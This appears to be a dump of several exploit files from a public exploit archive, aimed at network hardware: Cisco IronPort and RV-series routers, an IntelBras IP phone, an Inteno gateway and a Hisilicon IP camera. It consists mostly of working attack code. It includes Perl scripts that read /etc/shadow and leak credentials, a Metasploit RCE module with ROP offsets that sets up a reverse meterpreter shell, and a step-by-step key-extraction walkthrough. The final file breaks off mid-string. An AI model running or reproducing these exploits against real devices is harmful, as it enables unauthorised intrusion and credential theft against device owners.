# The usual disclaimer applies, especially the fact that Todor Donev is not liable for any damages
# caused by direct or indirect use of the information or functionality provided by these programs.
# The author or any Internet provider bears NO responsibility for content or misuse of these programs
# or any derivatives thereof. By using these programs you accept the fact that any damage (dataloss,
# system crash, system compromise, etc.) caused by the use of these programs are not Todor Donev's
# responsibility.
#
# Use them at your own risk!
#
#
use strict;
use HTTP::Request;
use LWP::UserAgent;
use WWW::UserAgent::Random;
use HTTP::CookieJar::LWP;
my $host = shift || 'https://192.168.1.1:443/';
print ("[+] Cisco (Titsco) Email Security Appliance (IronPort) C160 Header 'Host' Injection\n");
print ("===================================================================================\n");
print ("[!] Author: Todor Donev <todor.donev\@gmail.com>\n");
print ("[?] e.g. perl $0 https://target:port/\n") and exit if ($host !~ m/^http/);
my $user_agent = rand_ua("browsers");
my $jar = HTTP::CookieJar::LWP->new();
my $browser = LWP::UserAgent->new(
protocols_allowed => ['http', 'https'],
ssl_opts => { verify_hostname => 0 }
);
$browser->timeout(10);
$browser->cookie_jar($jar);
$browser->agent($user_agent);
my $request = HTTP::Request->new (POST => $host,
[ Content_Type => "application/x-www-form-urlencoded" ,
Referer => $host], " ");
$request->header("Host" => "Header-Injection");
my $content = $browser->request($request);
print $content->headers_as_string();

102
exploits/hardware/remote/47337.pl Executable file
View file

@ -0,0 +1,102 @@
#!/usr/bin/perl -w
#
# IntelBras TELEFONE IP TIP200/200 LITE 60.61.75.15 'dumpConfigFile' Pre-Auth Remote Arbitrary File Read
#
# Todor Donev 2019 (c) <todor.donev at gmail.com>
#
#
# Disclaimer:
# This or previous programs are for Educational purpose ONLY. Do not use it without permission.
# The usual disclaimer applies, especially the fact that Todor Donev is not liable for any damages
# caused by direct or indirect use of the information or functionality provided by these programs.
# The author or any Internet provider bears NO responsibility for content or misuse of these programs
# or any derivatives thereof. By using these programs you accept the fact that any damage (dataloss,
# system crash, system compromise, etc.) caused by the use of these programs are not Todor Donev's
# responsibility.
#
# Use them at your own risk!
#
# [test@localhost intelbras]$ perl intelbras_telefone_ip_tip_200_200_lite.pl
#
# # IntelBras TELEFONE IP TIP200/200 LITE 60.61.75.15 'dumpConfigFile' Pre-Auth Remote Arbitrary File Read
# # ========================================================================================================
# # Author: Todor Donev 2019 (c) <todor.donev at gmail.com>
# # ========================================================================================================
# # > Authorization => Basic dXNlcjp1c2Vy
# # > User-Agent => Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)
# # > Content-Type => application/x-www-form-urlencoded
# # < Accept-Ranges => bytes
# # < Server => SIPPhone
# # < Content-Type => text/html;charset=UTF-8
# # < Expires => -1
# # < Client-Date => Sun, 01 Sep 2019 13:37:00 GMT
# # < Client-Peer => 192.168.1.1
# # < Client-Response-Num => 1
# # ========================================================================================================
# root:$1$IJZx7biF$BgyHlA/AgR27VSEBALpqn1:11876:0:99999:7:::
# admin:$1$Bwt9zCNI$7rGLYt.wk.axE.6FUNFZe.:11876:0:99999:7:::
# guest:$1$A3lIJ0aO$Is8Ym.J/mpNejleongGft.:11876:0:99999:7:::
#
# # ========================================================================================================
# [test@localhost intelbras]$
#
# Simple Mode:
# perl intelbras_telefone_ip_tip_200_200_lite.pl | grep -v "^#"
#
use strict;
use v5.10;
use HTTP::Request;
use LWP::UserAgent;
use WWW::UserAgent::Random;
my $host = shift || '';
my $file = shift || '/etc/shadow';
my $user = shift || 'user';
my $pass = shift || 'user';
print "
# IntelBras TELEFONE IP TIP200/200 LITE 60.61.75.15 \'dumpConfigFile\' Pre-Auth Remote Arbitrary File Read
# ========================================================================================================
# Author: Todor Donev 2019 (c) <todor.donev at gmail.com>
";
if ($host !~ m/^http/){
print "# e.g. perl $0 https://target:port/ /etc/shadow user user
# e.g. perl $0 https://target:port/ /phone/factory/user.ini user user
# e.g. perl $0 https://target:port/ /phone/config/WebItemsLevel.cfg user user
# e.g. perl $0 https://target:port/ /phone/config/.htpasswd user user
";
exit;
}
my $user_agent = rand_ua("browsers");
my $browser = LWP::UserAgent->new(
protocols_allowed => ['http', 'https'],
ssl_opts => { verify_hostname => 0 }
);
$browser->timeout(10);
$browser->agent($user_agent);
my $payload = $host."/cgi-bin/cgiServer.exx?command=dumpConfigFile(\"$file\")";
my $request = HTTP::Request->new (GET => $payload,[ Content_Type => "application/x-www-form-urlencoded"], " ");
$request->authorization_basic($user, $pass);
print "# ========================================================================================================\n";
my $response = $browser->request($request);
say "# > $_ => ", $request->header($_) for $request->header_field_names;
say "# < $_ => ", $response->header($_) for $response->header_field_names;
print "# 401 Unauthorized! Wrong Username or Password!\n" and exit if ($response->code eq '401');
print "# ========================================================================================================\n";
if ($response->content =~ m/$file/g){
my $content = $response->content;
$content =~ s/$file//g;
$content =~ s/^\n+//;
print $content;
print "\n# ========================================================================================================\n";
exit;
} else {
print "# Exploit failed or full path is wrong..\n";
exit;
}

423
exploits/hardware/remote/47348.rb Executable file
View file

@ -0,0 +1,423 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
# linux/armle/meterpreter/bind_tcp -> segfault
# linux/armle/meterpreter/reverse_tcp -> segfault
# linux/armle/meterpreter_reverse_http -> works
# linux/armle/meterpreter_reverse_https -> works
# linux/armle/meterpreter_reverse_tcp -> works
# linux/armle/shell/bind_tcp -> segfault
# linux/armle/shell/reverse_tcp -> segfault
# linux/armle/shell_bind_tcp -> segfault
# linux/armle/shell_reverse_tcp -> segfault
#
class MetasploitModule < Msf::Exploit::Remote
Rank = GoodRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStager
include Msf::Exploit::Deprecated
moved_from 'exploit/linux/http/cisco_rv130_rmi_rce'
def initialize(info = {})
super(update_info(info,
'Name' => 'Cisco RV110W/RV130(W)/RV215W Routers Management Interface Remote Command Execution',
'Description' => %q{
A vulnerability in the web-based management interface of the Cisco RV110W Wireless-N VPN Firewall,
Cisco RV130W Wireless-N Multifunction VPN Router, and Cisco RV215W Wireless-N VPN Router
could allow an unauthenticated, remote attacker to execute arbitrary code on an affected device.
The vulnerability is due to improper validation of user-supplied data in the web-based management interface.
An attacker could exploit this vulnerability by sending malicious HTTP requests to a targeted device.
A successful exploit could allow the attacker to execute arbitrary code on the underlying operating
system of the affected device as a high-privilege user.
RV110W Wireless-N VPN Firewall versions prior to 1.2.2.1 are affected.
RV130W Wireless-N Multifunction VPN Router versions prior to 1.0.3.45 are affected.
RV215W Wireless-N VPN Router versions prior to 1.3.1.1 are affected.
Note: successful exploitation may not result in a session, and as such,
on_new_session will never repair the HTTP server, leading to a denial-of-service condition.
},
'Author' =>
[
'Yu Zhang', # Initial discovery (GeekPwn conference)
'Haoliang Lu', # Initial discovery (GeekPwn conference)
'T. Shiomitsu', # Initial discovery (Pen Test Partners)
'Quentin Kaiser <kaiserquentin@gmail.com>' # Vulnerability analysis & exploit dev
],
'License' => MSF_LICENSE,
'Platform' => %w[linux],
'Arch' => [ARCH_ARMLE, ARCH_MIPSLE],
'SessionTypes' => %w[meterpreter],
'CmdStagerFlavor' => %w{ wget },
'Privileged' => true, # BusyBox
'References' =>
[
['CVE', '2019-1663'],
['BID', '107185'],
['URL', 'https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190227-rmi-cmd-ex'],
['URL', 'https://www.pentestpartners.com/security-blog/cisco-rv130-its-2019-but-yet-strcpy/']
],
'DefaultOptions' => {
'WfsDelay' => 10,
'SSL' => true,
'RPORT' => 443,
'CMDSTAGER::FLAVOR' => 'wget',
'PAYLOAD' => 'linux/mipsle/meterpreter_reverse_tcp',
},
'Targets' =>
[
[ 'Cisco RV110W 1.1.0.9',
{
'offset' => 69,
'libc_base_addr' => 0x2af06000,
'libcrypto_base_addr' => 0x2ac01000,
'system_offset' => 0x00050d40,
'got_offset' => 0x0009d560,
# gadget 1 is in /usr/lib/libcrypto.so
'gadget1' => 0x00167c8c, # addiu $s0, $sp, 0x20; move $t9, $s4; jalr $t9; move $a0, $s0;
'Arch' => ARCH_MIPSLE,
'DefaultOptions' => {
'PAYLOAD' => 'linux/mipsle/meterpreter_reverse_tcp',
}
}
],
[ 'Cisco RV110W 1.2.0.9',
{
'offset' => 69,
'libc_base_addr' => 0x2af08000,
'libcrypto_base_addr' => 0x2ac03000,
'system_offset' => 0x0004c7e0,
'got_offset' => 0x00098db0,
# gadget 1 is in /usr/lib/libcrypto.so
'gadget1' => 0x00167c4c, # addiu $s0, $sp, 0x20; move $t9, $s4; jalr $t9; move $a0, $s0;
'Arch' => ARCH_MIPSLE,
'DefaultOptions' => {
'PAYLOAD' => 'linux/mipsle/meterpreter_reverse_tcp',
}
}
],
[ 'Cisco RV110W 1.2.0.10',
{
'offset' => 69,
'libc_base_addr' => 0x2af09000,
'libcrypto_base_addr' => 0x2ac04000,
'system_offset' => 0x0004c7e0,
'got_offset' => 0x00098db0,
# gadget 1 is in /usr/lib/libcrypto.so
'gadget1' => 0x00151fbc, # addiu $s0, $sp, 0x20; move $t9, $s4; jalr $t9; move $a0, $s0;
'Arch' => ARCH_MIPSLE,
'DefaultOptions' => {
'PAYLOAD' => 'linux/mipsle/meterpreter_reverse_tcp',
}
}
],
[ 'Cisco RV110W 1.2.1.4',
{
'offset' => 69,
'libc_base_addr' => 0x2af54000,
'libcrypto_base_addr' => 0x2ac4f000,
'system_offset' => 0x0004c7e0,
'got_offset' => 0x00098db0,
# gadget 1 is in /usr/lib/libcrypto.so
'gadget1' => 0x0005059c, # addiu $s0, $sp, 0x20; move $t9, $s4; jalr $t9; move $a0, $s0;
'Arch' => ARCH_MIPSLE,
'DefaultOptions' => {
'PAYLOAD' => 'linux/mipsle/meterpreter_reverse_tcp',
}
}
],
[ 'Cisco RV110W 1.2.1.7',
{
'offset' => 69,
'libc_base_addr' => 0x2af98000,
'libcrypto_base_addr' => 0x2ac4f000,
'system_offset' => 0x0004c7e0,
'got_offset' => 0x00098db0,
# gadget 1 is in /usr/lib/libcrypto.so
'gadget1' => 0x0003e7dc, # addiu $s0, $sp, 0x20; move $t9, $s4; jalr $t9; move $a0, $s0;
'Arch' => ARCH_MIPSLE,
'DefaultOptions' => {
'PAYLOAD' => 'linux/mipsle/meterpreter_reverse_tcp',
}
}
],
[ 'Cisco RV130/RV130W < 1.0.3.45',
{
'offset' => 446,
'libc_base_addr' => 0x357fb000,
'system_offset' => 0x0004d144,
'gadget1' => 0x00020e79, # pop {r2, r6, pc};
'gadget2' => 0x00041308, # mov r0, sp; blx r2;
'Arch' => ARCH_ARMLE,
'DefaultOptions' => {
'PAYLOAD' => 'linux/armle/meterpreter_reverse_tcp',
}
},
],
[ 'Cisco RV215W 1.1.0.5',
{
'offset' => 69,
'libc_base_addr' => 0x2af59000,
'libcrypto_base_addr' => 0x2ac54000,
'system_offset' => 0x0004c7e0,
'got_offset' => 0x00098db0,
# gadget 1 is in /usr/lib/libcrypto.so
'gadget1' => 0x0005059c, # addiu $s0, $sp, 0x20; move $t9, $s4; jalr $t9; move $a0, $s0;
'Arch' => ARCH_MIPSLE,
'DefaultOptions' => {
'PAYLOAD' => 'linux/mipsle/meterpreter_reverse_tcp',
}
}
],
[ 'Cisco RV215W 1.1.0.6',
{
'offset' => 69,
'libc_base_addr' => 0x2af59000,
'libcrypto_base_addr' => 0x2ac54000,
'system_offset' => 0x0004c7e0,
'got_offset' => 0x00098db0,
# gadget 1 is in /usr/lib/libcrypto.so
'gadget1' => 0x00151fbc, # addiu $s0, $sp, 0x20; move $t9, $s4; jalr $t9; move $a0, $s0;
'Arch' => ARCH_MIPSLE,
'DefaultOptions' => {
'PAYLOAD' => 'linux/mipsle/meterpreter_reverse_tcp',
}
}
],
[ 'Cisco RV215W 1.2.0.14',
{
'offset' => 69,
'libc_base_addr' => 0x2af5f000,
'libcrypto_base_addr' => 0x2ac5a001,
'system_offset' => 0x0004c7e0,
'got_offset' => 0x00098db0,
# gadget 1 is in /usr/lib/libcrypto.so
'gadget1' => 0x0005059c, # addiu $s0, $sp, 0x20; move $t9, $s4; jalr $t9; move $a0, $s0;
'Arch' => ARCH_MIPSLE,
'DefaultOptions' => {
'PAYLOAD' => 'linux/mipsle/meterpreter_reverse_tcp',
}
}
],
[ 'Cisco RV215W 1.2.0.15',
{
'offset' => 69,
'libc_base_addr' => 0x2af5f000,
'libcrypto_base_addr' => 0x2ac5a000,
'system_offset' => 0x0004c7e0,
'got_offset' => 0x00098db0,
# gadget 1 is in /usr/lib/libcrypto.so
'gadget1' => 0x0005059c, # addiu $s0, $sp, 0x20; move $t9, $s4; jalr $t9; move $a0, $s0;
'Arch' => ARCH_MIPSLE,
'DefaultOptions' => {
'PAYLOAD' => 'linux/mipsle/meterpreter_reverse_tcp',
}
}
],
[ 'Cisco RV215W 1.3.0.7',
{
'offset' => 77,
'libc_base_addr' => 0x2afeb000,
'libcrypto_base_addr' => 0x2aca5000,
'system_offset' => 0x0004c7e0,
'got_offset' => 0x000a0530,
# gadget 1 is in /usr/lib/libcrypto.so
'gadget1' => 0x00057bec, # addiu $s0, $sp, 0x20; move $t9, $s4; jalr $t9; move $a0, $s0;
'Arch' => ARCH_MIPSLE,
'DefaultOptions' => {
'PAYLOAD' => 'linux/mipsle/meterpreter_reverse_tcp',
}
}
],
[ 'Cisco RV215W 1.3.0.8',
{
'offset' => 77,
'libc_base_addr' => 0x2afee000,
'libcrypto_base_addr' => 0x2aca5000,
'system_offset' => 0x0004c7e0,
'got_offset' => 0x000a0530,
# gadget 1 is in /usr/lib/libcrypto.so
'gadget1' => 0x0003e7dc, # addiu $s0, $sp, 0x20; move $t9, $s4; jalr $t9; move $a0, $s0;
'Arch' => ARCH_MIPSLE,
'DefaultOptions' => {
'PAYLOAD' => 'linux/mipsle/meterpreter_reverse_tcp',
}
}
],
],
'DisclosureDate' => 'Feb 27 2019',
'DefaultTarget' => 0,
'Notes' => {
'Stability' => [ CRASH_SERVICE_DOWN, ],
},
))
end
def p(lib, offset)
[(lib + offset).to_s(16)].pack('H*').reverse
end
def prepare_shellcode(cmd)
case target
# RV110W 1.1.0.9, 1.2.0.9, 1.2.0.10, 1.2.1.4, 1.2.1.7
# RV215W 1.1.0.5, 1.1.0.6, 1.2.0.14, 1.2.0.15, 1.3.0.7, 1.3.0.8
when targets[0], targets[1], targets[2], targets[3], targets[4], targets[6], targets[7], targets[8], targets[9], targets[10], targets[11]
shellcode = rand_text_alpha(target['offset']) + # filler
rand_text_alpha(4) + # $s0
rand_text_alpha(4) + # $s1
rand_text_alpha(4) + # $s2
rand_text_alpha(4) + # $s3
p(target['libc_base_addr'], target['system_offset']) + # $s4
rand_text_alpha(4) + # $s5
rand_text_alpha(4) + # $s6
rand_text_alpha(4) + # $s7
rand_text_alpha(4) + # $s8
p(target['libcrypto_base_addr'], target['gadget1']) + # $ra
p(target['libc_base_addr'], target['got_offset']) +
rand_text_alpha(28) +
cmd
shellcode
when targets[5] # RV130/RV130W
shellcode = rand_text_alpha(target['offset']) + # filler
p(target['libc_base_addr'], target['gadget1']) +
p(target['libc_base_addr'], target['system_offset']) + # r2
rand_text_alpha(4) + # r6
p(target['libc_base_addr'], target['gadget2']) + # pc
cmd
shellcode
end
end
def send_request(buffer)
begin
send_request_cgi({
'uri' => '/login.cgi',
'method' => 'POST',
'vars_post' => {
"submit_button": "login",
"submit_type": "",
"gui_action": "",
"wait_time": 0,
"change_action": "",
"enc": 1,
"user": rand_text_alpha_lower(5),
"pwd": buffer,
"sel_lang": "EN"
}
})
rescue ::Rex::ConnectionError
fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the router")
end
end
def check
# We fingerprint devices using SHA1 hash of a web resource accessible to unauthenticated users.
# We use lang_pack/EN.js because it's the one file that changes the most between versions.
# Note that it's not a smoking gun given that some branches keep the exact same files in /www
# (see RV110 branch 1.2.1.x/1.2.2.x, RV130 > 1.0.3.22, RV215 1.2.0.x/1.3.x)
fingerprints = {
"69d906ddd59eb6755a7b9c4f46ea11cdaa47c706" => {
"version" => "Cisco RV110W 1.1.0.9",
"status" =>Exploit::CheckCode::Vulnerable
},
"8d3b677d870425198f7fae94d6cfe262551aa8bd" => {
"version" => "Cisco RV110W 1.2.0.9",
"status" => Exploit::CheckCode::Vulnerable
},
"134ee643ec877641030211193a43cc5e93c96a06" => {
"version" => "Cisco RV110W 1.2.0.10",
"status" => Exploit::CheckCode::Vulnerable
},
"e3b2ec9d099a3e3468f8437e5247723643ff830e" => {
"version" => "Cisco RV110W 1.2.1.4, 1.2.1.7, 1.2.2.1 (not vulnerable), 1.2.2.4 (not vulnerable)",
"status" => Exploit::CheckCode::Unknown
},
"6b7b1e8097e8dda26db27a09b8176b9c32b349b3" => {
"version" => "Cisco RV130/RV130W 1.0.0.21",
"status" => Exploit::CheckCode::Vulnerable
},
"9b1a87b752d11c5ba97dd80d6bae415532615266" => {
"version" => "Cisco RV130/RV130W 1.0.1.3",
"status" => Exploit::CheckCode::Vulnerable
},
"9b6399842ef69cf94409b65c4c61017c862b9d09" => {
"version" => "Cisco RV130/RV130W 1.0.2.7",
"status" => Exploit::CheckCode::Vulnerable
},
"8680ec6df4f8937acd3505a4dd36d40cb02c2bd6" => {
"version" => "Cisco RV130/RV130W 1.0.3.14, 1.0.3.16",
"status" => Exploit::CheckCode::Vulnerable
},
"8c8e05de96810a02344d96588c09b21c491ede2d" => {
"version" => "Cisco RV130/RV130W 1.0.3.22, 1.0.3.28, 1.0.3.44, 1.0.3.45 (not vulnerable), 1.0.3.51 (not vulnerable)",
"status" => Exploit::CheckCode::Unknown
},
"2f29a0dfa78063d643eb17388e27d3f804ff6765" => {
"version" => "Cisco RV215W 1.1.0.5",
"status" => Exploit::CheckCode::Vulnerable
},
"e5cc84d7c9c2d840af85d5f25cee33baffe3ca6f" => {
"version" => "Cisco RV215W 1.1.0.6",
"status" => Exploit::CheckCode::Vulnerable
},
"7cc8fcce5949a68c31641c38255e7f6ed31ff4db" => {
"version" => "Cisco RV215W 1.2.0.14 or 1.2.0.15",
"status" => Exploit::CheckCode::Vulnerable
},
"050d47ea944eaeadaec08945741e8e380f796741" => {
"version" => "Cisco RV215W 1.3.0.7 or 1.3.0.8, 1.3.1.1 (not vulnerable), 1.3.1.4 (not vulnerable)",
"status" => Exploit::CheckCode::Unknown
}
}
uri = target_uri.path
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(uri, 'lang_pack/EN.js')
})
if res && res.code == 200
fingerprint = Digest::SHA1.hexdigest("#{res.body.to_s}")
if fingerprints.key?(fingerprint)
print_good("Successfully identified device: #{fingerprints[fingerprint]["version"]}")
return fingerprints[fingerprint]["status"]
else
print_status("Couldn't reliably fingerprint the target.")
end
end
Exploit::CheckCode::Unknown
end
def exploit
print_status('Sending request')
execute_cmdstager
end
def execute_command(cmd, opts = {})
shellcode = prepare_shellcode(cmd.to_s)
send_request(shellcode)
end
def on_new_session(session)
# Given there is no process continuation here, the httpd server will stop
# functioning properly and we need to take care of proper restart
# ourselves.
print_status("Reloading httpd service")
reload_httpd_service = "killall httpd && cd /www && httpd && httpd -S"
if session.type.to_s.eql? 'meterpreter'
session.core.use 'stdapi' unless session.ext.aliases.include? 'stdapi'
session.sys.process.execute '/bin/sh', "-c \"#{reload_httpd_service}\""
else
session.shell_command(reload_httpd_service)
end
ensure
super
end
end

96
exploits/hardware/remote/47390.txt Normal file
View file

@ -0,0 +1,96 @@
# Exploit Title: Inteno IOPSYS Gateway 3DES Key Extraction - Improper Access Restrictions
# Date: 2019-06-29
# Exploit Author: Gerard Fuguet (gerard@fuguet.cat)
# Vendor Homepage: https://www.intenogroup.com/
# Version: EG200-WU7P1U_ADAMO3.16.4-190226_1650
# Fixed Version: EG200-WU7P1U_ADAMO3.16.8-190820_0937
# Affected Component: SIP password, Info Gathering of Network Config
# Attack Type: Remote
# Tested on: Kali Linux 2019.2 against an Inteno EG200 Router
# CVE : CVE-2019-13140
# Description:
Inteno EG200 EG200-WU7P1U_ADAMO3.16.4-190226_1650 and before
firmwares routers have a JUCI ACL misconfiguration that allows
the "user" account to extract the 3DES key via JSON commands to ubus.
The 3DES key is used to decrypt the provisioning file provided by
Adamo Telecom on a public URL via cleartext HTTP.
# Attack Vectors:
To get success on the exploitation, two components are mandatory: 1.
the encrypted file (.enc) and 2. The 3DES key for decrypt it. The
encrypted file can be downloaded via HTTP URL offered by Adamo ISP
(works from any external network). Then is need to interact with the
router using WebSocket protocol to obtain the 3DES key, a web browser
like Firefox can be used as WebSocket client under the developer
tools. Session id is acquired with the same username and password of
the router (in this case, password is the same as wifi defaults). Once
3DES key is obtained through a JSON request command, .enc file can be
decrypted with the help of openssl tool.
# PoC:
Step 1: Getting the provisioning file
Download from http://inteno-provisioning.adamo.es/XXXXXXXXXXXX.enc
Where XXXXXXXXXXXX is your routers Inteno MAC, all in capitals and without
the colons. You can also get your MAC by doing a ping to the router
and then an arp command on terminal.
Step 2: The 3DES Key
Let's communcatie by Sockets
- Using Firefox, open the routers webpage (192.168.1.1 by default).
- Invoke the developer tools by pressing F12 and go to the Console Tab.
- Lets create the WebSocket:
var superSocket = new WebSocket("ws://192.168.1.1/", "ubus-json")
- And creating the Log for show responses in each petition:
superSocket.onmessage = function (event) {console.log(event.data)}
- We request an ID session with the same login parameters that when access
to the routers website. (put your wifis router password instead of
wifis-password value):
superSocket.send(JSON.stringify({"jsonrpc":"2.0","method":"call","params":["00000000000000000000000000000000","session","login",{"username":"user","password":"wifis-password"}],"id":666}))
- Now, you will obtain a response, the value of the parameter that says
“ubus_rpc_session” refers to your sessions ID, copy it to use in the next
request call.
- Requesting information about the routers System. (put your session ID
instead of put-your-session-id-here value):
superSocket.send(JSON.stringify({"jsonrpc":"2.0","method":"call","params":["put-your-session-id-here","router.system","info",{}],"id":999}))
- On the response obtained, copy the value of the “des” parameter.
Its 16 digits that we need convert to hexadecimal.
Step 3: Ready for Decrypting
Convert to HEX using xxd tool where XXXXXXXXXXXXXXXX is your "des" key:
echo -n XXXXXXXXXXXXXXXX | xxd -p
- Use openssl tool to decrypt your provisioning file. (Put your "des" key
instead of your-des-key-in-hex-format value and the XXXXXXXXXXXX
refers the name of your encryption provisioning file, in the -out
value, the name can be different):
openssl enc -d -des-ede -nosalt -K your-des-key-in-hex-format -in XXXXXXXXXXXX.enc -out XXXXXXXXXXXX.tar.gz
- Uncompress the decrypted file:
tar -xzvf XXXXXXXXXXXX.tar.gz
- You get the file: Provisioning.conf.
- Showing the file:
cat Provisioning.conf
- The end of the line refers to the secret, the password of your
SIP account.
A video was created to show all these Steps in action:
https://youtu.be/uObz1uE5P4s
# Additional Information:
A packet sniffer like Wireshark can be used for retrieve the 3DES key
instead of using WebSocket communication protocol. In that case, user
needs to do the login on the router's page, and then the JSON request
containing the 3DES key will be catched.
# References:
https://twitter.com/GerardFuguet/status/1169298861782896642
https://www.slideshare.net/fuguet/call-your-key-to-phone-all
# Timeline:
2019-06-29 - White Paper done
2019-07-01 - CVE assigned
2019-07-09 - Notified to Inteno
2019-07-11 - Adamo aware and ask for detailed info
2019-07-12 - Info facilitated
2019-07-25 - Early patch available and applied (Cooperation starts)
2019-07-26 - Tested and failed (VoIP not working)
2019-08-27 - New firmware available
2019-08-30 - Firmware EG200-WU7P1U_ADAMO3.16.8-190820_0937 applied on router
2019-08-31 - Tested OK
2019-09-04 - Disclosure published

114
exploits/hardware/remote/47405.pl Executable file
View file

@ -0,0 +1,114 @@
#!/usr/bin/perl -w
#
# Hisilicon HiIpcam V100R003 Remote ADSL Credentials Disclosure
#
# Copyright 2019 (c) Todor Donev <todor.donev at gmail.com>
#
#
# # [
# # [ Hisilicon HiIpcam V100R003 Remote ADSL Credentials Disclosure
# # [ =============================================================
# # [ Exploit Author: Todor Donev 2019 <todor.donev@gmail.com>
# # [
# # [ Disclaimer:
# # [ This or previous programs are for Educational purpose
# # [ ONLY. Do not use it without permission. The usual
# # [ disclaimer applies, especially the fact that Todor Donev
# # [ is not liable for any damages caused by direct or
# # [ indirect use of the information or functionality provided
# # [ by these programs. The author or any Internet provider
# # [ bears NO responsibility for content or misuse of these
# # [ programs or any derivatives thereof. By using these programs
# # [ you accept the fact that any damage (dataloss, system crash,
# # [ system compromise, etc.) caused by the use of these programs
# # [ are not Todor Donev's responsibility.
# # [
# # [ Use them at your own risk!
# # [
# # [ Initializing the browser
# # [ Server: thttpd/2.25b 29dec2003
# # [ The target is vulnerable
# # [
# # [ Directory Traversal
# # [
# # [ /cgi-bin/..
# # [ /cgi-bin/adsl_init.cgi
# # [ /cgi-bin/chkwifi.cgi
# # [ /cgi-bin/ddns_start.cgi
# # [ /cgi-bin/getadslattr.cgi
# # [ /cgi-bin/getddnsattr.cgi
# # [ /cgi-bin/getinetattr.cgi
# # [ /cgi-bin/getinterip.cgi
# # [ /cgi-bin/getnettype.cgi
# # [ /cgi-bin/getupnp.cgi
# # [ /cgi-bin/getwifi.cgi
# # [ /cgi-bin/getwifiattr.cgi
# # [ /cgi-bin/ptzctrldown.cgi
# # [ /cgi-bin/ptzctrlleft.cgi
# # [ /cgi-bin/ptzctrlright.cgi
# # [ /cgi-bin/ptzctrlup.cgi
# # [ /cgi-bin/ptzctrlzoomin.cgi
# # [ /cgi-bin/ptzctrlzoomout.cgi
# # [ /cgi-bin/ser.cgi
# # [ /cgi-bin/setadslattr.cgi
# # [ /cgi-bin/setddnsattr.cgi
# # [ /cgi-bin/setinetattr.cgi
# # [ /cgi-bin/setwifiattr.cgi
# # [ /cgi-bin/testwifi.cgi
# # [ /cgi-bin/upnp_start.cgi
# # [ /cgi-bin/upnp_stop.cgi
# # [ /cgi-bin/wifi_start.cgi
# # [ /cgi-bin/wifi_stop.cgi
# # [
# # [ File Reading
# # [
# # [ var ip = "" ;
# # [ var adslenable = "" ;
# # [ var username = "hacker" ;
# # [ var password = "133337" ;
# # [ var dnsauto = "1" ;
# # [ var dns1 = "8.8.8.8" ;
# # [ var dns2 = "8.8.4.4" ;
#
#
use strict;
use HTTP::Request;
use LWP::UserAgent;
use WWW::UserAgent::Random;
use HTML::TreeBuilder;
$| = 1;
my $host = shift || 'https://192.168.1.1/'; # Full path url to the store
print "\033[2J"; #clear the screen
print "\033[0;0H"; #jump to 0,0
my $banner = "\x5b\x20\x0a\x5b\x20\x48\x69\x73\x69\x6c\x69\x63\x6f\x6e\x20\x48\x69\x49\x70\x63\x61\x6d\x20\x56\x31\x30\x30\x52\x30\x30\x33\x20\x52\x65\x6d\x6f\x74\x65\x20\x41\x44\x53\x4c\x20\x43\x72\x65\x64\x65\x6e\x74\x69\x61\x6c\x73\x20\x44\x69\x73\x63\x6c\x6f\x73\x75\x72\x65\x0a\x5b\x20\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x0a\x5b\x20\x45\x78\x70\x6c\x6f\x69\x74\x20\x41\x75\x74\x68\x6f\x72\x3a\x20\x54\x6f\x64\x6f\x72\x20\x44\x6f\x6e\x65\x76\x20\x32\x30\x31\x39\x20\x3c\x74\x6f\x64\x6f\x72\x2e\x64\x6f\x6e\x65\x76\x40\x67\x6d\x61\x69\x6c\x2e\x63\x6f\x6d\x3e\x0a\x5b\x0a\x5b\x20\x20\x44\x69\x73\x63\x6c\x61\x69\x6d\x65\x72\x3a\x0a\x5b\x20\x20\x54\x68\x69\x73\x20\x6f\x72\x20\x70\x72\x65\x76\x69\x6f\x75\x73\x20\x70\x72\x6f\x67\x72\x61\x6d\x73\x20\x61\x72\x65\x20\x66\x6f\x72\x20\x45\x64\x75\x63\x61\x74\x69\x6f\x6e\x61\x6c\x20\x70\x75\x72\x70\x6f\x73\x65\x0a\x5b\x20\x20\x4f\x4e\x4c\x59\x2e\x20\x44\x6f\x20\x6e\x6f\x74\x20\x75\x73\x65\x20\x69\x74\x20\x77\x69\x74\x68\x6f\x75\x74\x20\x70\x65\x72\x6d\x69\x73\x73\x69\x6f\x6e\x2e\x20\x54\x68\x65\x20\x75\x73\x75\x61\x6c\x20\x0a\x5b\x20\x20\x64\x69\x73\x63\x6c\x61\x69\x6d\x65\x72\x20\x61\x70\x70\x6c\x69\x65\x73\x2c\x20\x65\x73\x70\x65\x63\x69\x61\x6c\x6c\x79\x20\x74\x68\x65\x20\x66\x61\x63\x74\x20\x74\x68\x61\x74\x20\x54\x6f\x64\x6f\x72\x20\x44\x6f\x6e\x65\x76\x0a\x5b\x20\x20\x69\x73\x20\x6e\x6f\x74\x20\x6c\x69\x61\x62\x6c\x65\x20\x66\x6f\x72\x20\x61\x6e\x79\x20\x64\x61\x6d\x61\x67\x65\x73\x20\x63\x61\x75\x73\x65\x64\x20\x62\x79\x20\x64\x69\x72\x65\x63\x74\x20\x6f\x72\x20\x0a\x5b\x20\x20\x69\x6e\x64\x69\x72\x65\x63\x74\x20\x75\x73\x65\x20\x6f\x66\x20\x74\x68\x65\x20\x20\x69\x6e\x66\x6f\x72\x6d\x61\x74\x69\x6f\x6e\x20\x6f\x72\x20\x66\x75\x6e\x63\x74\x69\x6f\x6e\x61\x6c\x69\x74\x79\x20\x70\x72\x6f\x76\x69\x64\x65\x64\x0a\x5b\x20\x20\x62\x79\x20\x74\x68\x65\x73\x65\x20\x70\x72\x6f\x67\x72\x61\x6d\x73\x2e\x20\x54\x68\x65\x20\x61\x75\x74\x68\x6f\x72\x20\x6f\x72\x20\x61\x6e\x79\x20\x